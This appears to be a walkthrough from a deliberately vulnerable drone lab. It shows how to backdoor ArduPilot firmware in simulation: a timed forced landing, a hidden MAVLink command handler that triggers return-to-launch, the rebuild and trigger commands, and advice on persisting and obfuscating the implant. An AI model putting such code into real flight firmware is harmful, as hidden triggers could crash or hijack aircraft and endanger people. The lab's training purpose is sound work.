Follow the Firmware Decompile scenario to extract and disassemble the drone’s current arducopter binary using Ghidra. This allows you to trace execution paths and identify insertion points for code injection.

On your host machine, clone the ArduPilot repository:

Target a logic control point. Popular candidates include:

• mode_guided.cpp
• mode_auto.cpp
• GCS_Mavlink.cpp
• commands.cpp

Example: Inject a malicious LAND trigger after 30 seconds of runtime:

In mode_guided.cpp, inside Guided::run():

if (millis() > 30000) {
    gcs().send_text(MAV_SEVERITY_CRITICAL, "Malicious Landing Triggered.");
    set_mode(LAND, MODE_REASON_GCS_COMMAND);
}

Or add a hidden MAV_CMD handler in GCS_MAVLink.cpp:

case 199:  // Arbitrary unassigned command
    gcs().send_text(MAV_SEVERITY_NOTICE, "Backdoor command received");
    set_mode(RTL, MODE_REASON_GCS_COMMAND);
    break;

Still inside the container:

cd /opt/ardupilot
./waf distclean
./waf configure --board sitl
./waf copter

The compiled binary will be available at:

build/sitl/bin/arducopter

Copy the modified binary into the DVD flight controller container:

Ensure the launch wrapper in the container references /usr/local/bin/arducopter.

Re-open DVD using QGroundControl or MAVProxy. You can now test the payload:

• For automatic behaviors, wait ~30s after boot and observe if LAND is triggered
• For custom MAV_CMDs, run:

mavproxy.py --master=tcp:127.0.0.1:5760

Then send your injected command:

command long 1 1 199 0 0 0 0 0 0 0

Watch for text responses like:

Backdoor command received

You can observe changes in drone behavior (e.g., RTL, LAND, or armed state toggling).

To persist your payload:

• Rebuild and overwrite the firmware image in the Docker base layer (rebuild the DVD image with COPY instruction)
• Obfuscate the logic using random delays, conditional checks, or wrapping inside existing conditions (e.g., if (g.failsafe == true))